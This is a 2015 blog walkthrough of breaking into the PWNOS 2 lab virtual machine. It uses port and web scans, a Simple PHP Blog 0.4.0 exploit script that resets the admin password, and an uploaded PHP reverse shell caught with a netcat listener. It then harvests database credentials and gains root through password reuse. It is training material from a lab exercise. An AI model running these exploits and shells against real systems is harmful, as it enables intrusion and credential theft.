Def Security Jam: July 2015

Needing to keep the old knife sharp, i decided to try my luck at the PWNOS 2 vulnerable virtual machine. After setting up the VM in VirtualBox. I took the approach of configuring a NAT Network with the range of 10.10.10.0/24 which placed my machine on the same subnet as the static IP of 10.10.10.100 assigned to the image.

root@kali:~# nmap 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:44 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
root@kali:~# nmap -A 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:45 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Welcome to this Site!
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
root@kali:~#

The default webpage on port 80 seemed to be an Intranet web site

I decided to run my usual set of web server enumeration tools against the box.

root@kali:~# nikto -h http://10.10.10.100
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 80
+ Start Time: 2015-07-04 22:47:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 7331 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2015-07-04 22:47:25 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#

root@kali:~# dirb http://10.10.10.100 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Sat Jul 4 22:48:59 2015
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50171)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5921)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5670)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4954)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5312)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
DOWNLOADED: 40916 - FOUND: 28
root@kali:~#

The DirBuster scan also revealed a login.php site which seemed to be prone to SQL Injection but was definitely filtering some of the more basic exploits.

I decided to take a closer look at the source of the /blog page. I found that the underlying app was Simple PHP Blog 0.4.0.

Lets see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0

The exploitdb had a couple exploits that fit the bill, one Metasploit module as well as the perl based exploit that I decided to go with

root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 2

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Username and Password Hash Retrieval Exploit....

Retrieved Username and Password Hash: $1$zsdi5o/7$kJuEkwpL6uEqhrXFDn98y/

*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....

Deleted File: ./config/password.txt
Use of uninitialized value $user in concatenation (.) or string at 1191.pl line 341.
./config/password.txt created!
Use of uninitialized value $pass in concatenation (.) or string at 1191.pl line 342.
Username is set to:
Password is set to:

*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3 -U court -P password

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....

Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: court
Password is set to: password

*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# ls
1191.pl exploit2.php exploit.php
root@kali:~/pwnos2# cp /var/www/php-reverse-shell.php .
root@kali:~/pwnos2# nano php-reverse-shell.php
root@kali:~/pwnos2#

Awesome, the exploit allow me to create on the blog application, hopefully I can now upload a web or reverse shell to the system.

The first place I always check in on the Kali Linux disto under /usr/share/webshells/php. I used the old reliable php_reverse_shell.php. After modifying the code to match my IP address, I successfully uploaded the code to the blog site. I was afraid that it I'd run into filtering which would restrict the file type, but was lucky this time.

I uploaded the shell, started a netcat listener on my system for port 1234, as set within my php_reverse_shell.php file, browsed to the malicious page (10.10.10.100/blog/images/php_reverse_shell.php) and boom! I'm in

Having no job control in this shell I used the installed instance of python to get an improved shell. I looked around a bit in the /var/www directory for interesting give-aways in files.

root@kali:~/pwnos2# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.10.10.5] from (UNKNOWN) [10.10.10.100] 36792
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
01:57:41 up 3:34, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off

$ /bin/bash -i
bash: no job control in this shell
www-data@web:/var/www$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@web:/var/www$ ls
ls
activate.php includes info.php mysqli_connect.php
blog index.php login.php register.php
www-data@web:/var/www$ more

The file named mysqli_connect.php had some mysql db credentials in it.

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

We all know about the likelihood of password reuse, so I attempted to try what I found both inside and outside the database. Unfortunately it didn't workout for me. I spent several hours running local privilege escalation exploits, Linux privilege vulnerability scripts, etc, until I stumbled across a separate file also named mysqli_connect.php located at in the /var directory. This file had separate credentials which worked for the mysql instance. I decided to pillage the db a bit.

cat mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var$

www-data@web:/var$ mysql -u root
mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
www-data@web:/var$ mysql -u root -proot@ISIntS
mysql -u root -proot@ISIntS
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1113
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ch16 |
| mysql |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users |
+----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email | pass | user_level | active | registration_date |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| 1 | Dan | Privett | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

mysql>

The db contents could have proven helpful in my conquest, but I gave the credentials a go on the system and boom, good ol'e password reuse strikes again.

Woot, Woot!

I enjoyed this VM allot, thanks to the guys at http://www.pwnos.com/. I'll keep my eyes open for a Version 3.

Def Security Jam

Friday, July 24, 2015

John McAfee - How to Uninstall McAfee Antivirus

Saturday, July 11, 2015

PWNOS Version 2 Walkthrough